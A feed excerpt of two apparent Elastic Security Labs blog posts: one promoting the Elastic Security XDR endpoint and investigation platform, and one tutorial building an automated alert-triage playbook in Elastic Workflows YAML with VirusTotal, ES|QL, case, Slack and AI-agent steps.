<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows, and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry, whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility is further extended through ongoing collaboration with the Osquery project. By extending Osquery-based forensics with supplemental tables for common investigative artifacts, Elastic helps uncover evidence such as browser history, AMCache records, and jumplist artifacts. These sources make it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Also available is a library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
<p>These capabilities turn artifact collection into an embedded step of the investigation rather than a separate workflow, so teams can confirm what happened and act sooner, all in one platform.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
<div class="youtube-video-container">
  <iframe width="560" height="315" src="https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv" title="Isolating a CrowdStrike-managed host directly from Elastic Security" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps</li>
</ul>
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle (capture a memory dump, collect a suspicious file with get-file, and list running processes) so responders have what they need immediately.</p>
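<p>As a rough sketch of what such a playbook could look like in Workflows YAML (the containment and evidence-collection step types shown here, <code>kibana.isolateHost</code> and <code>endpoint.memoryDump</code>, are illustrative placeholders, not confirmed step names; consult the Workflows step reference for the actual types):</p>
<pre><code class="language-yaml">name: Evidence Bundle On Alert
enabled: true
triggers:
  - type: alert
steps:
  # Hypothetical containment step: isolate the affected host immediately
  - name: isolate_host
    type: kibana.isolateHost
    with:
      host_id: &quot;{{ event.alerts[0].host.id }}&quot;

  # Hypothetical evidence-collection step mirroring the response actions above
  - name: capture_memory
    type: endpoint.memoryDump
    with:
      endpoint_id: &quot;{{ event.alerts[0].agent.id }}&quot;
</code></pre>
<p>The value is less in any single step than in the ordering: containment happens before a human opens the alert, and evidence is already waiting when the investigation begins.</p>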
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. The team tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections: why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools; they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn More</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML (connector credentials like VirusTotal API keys or Slack tokens are configured once in the connector under <strong>Stack Management &gt; Connectors</strong>):</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
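<p>To make the templating concrete, here are a few Liquid expressions you might use in a <code>with</code> block. The <code>default</code>, <code>size</code>, and <code>json</code> filters come from LiquidJS; check the templating reference for the full filter set available in your version:</p>
<pre><code class="language-yaml">    with:
      # Fall back to a placeholder when the field is absent on the alert
      hash: &quot;{{ event.alerts[0].file.hash.sha256 | default: 'unknown' }}&quot;
      # Count the alert documents in the triggering event
      note: &quot;{{ event.alerts | size }} alert(s) in this execution&quot;
      # Serialize a whole object, useful for logging or LLM prompts
      context: &quot;{{ event.rule | json }}&quot;
</code></pre>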
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
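<p>For example, a prevalence check for the same hash might look like the following sketch. The <code>logs-*</code> index pattern and field names are assumptions about your environment; adjust them to match your data:</p>
<pre><code class="language-yaml">  - name: hash_prevalence
    type: elasticsearch.esql.query
    with:
      query: |
        FROM logs-*
        | WHERE file.hash.sha256 == &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
        | STATS
            occurrences = COUNT(*),
            hosts_seen = COUNT_DISTINCT(host.name),
            first_seen = MIN(@timestamp)
      format: json
</code></pre>
<p>A hash seen on one host an hour ago reads very differently from one seen on fifty hosts over six months, and this step makes that distinction available to later branching logic.</p>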
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
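<p>The category can then feed the branch directly. A minimal sketch, reusing the step types from the playbook above (the <code>rationale</code> output field name is an assumption tied to <code>includeRationale</code>; verify it against the AI step reference):</p>
<pre><code class="language-yaml">  - name: route_alert
    type: if
    condition: steps.classify_alert.output.category == &quot;false_positive&quot;
    steps:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
    else:
      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            {{ steps.classify_alert.output.category }} alert on {{ event.alerts[0].host.name }}.
            Rationale: {{ steps.classify_alert.output.rationale }}
</code></pre>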
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
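<p>The same output can feed the Slack notification. A sketch, where the step type and channel name are illustrative placeholders rather than the connector's documented interface:</p>
<pre><code class="language-yaml">  - name: notify_team
    # Step type and channel are illustrative; use your Slack connector's actual step name
    type: slack.sendMessage
    with:
      channel: &quot;#soc-triage&quot;
      message: |
        New alert triaged:
        {{ steps.initial_summary.output.content }}
</code></pre>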
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
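<p>Attaching the agent's findings to the case uses the same named Kibana steps as the rest of the workflow. A minimal sketch, assuming a prior step named <code>create_case</code> and that the agent's findings are exposed on the step output:</p>
<pre><code class="language-yaml">  - name: attach_agent_findings
    type: kibana.addCaseComment
    with:
      # caseId comes from an earlier (assumed) create_case step
      caseId: &quot;${{ steps.create_case.output.id }}&quot;
      comment: |
        Agent investigation findings:
        {{ steps.escalate_to_agent.output | json }}
</code></pre>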
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
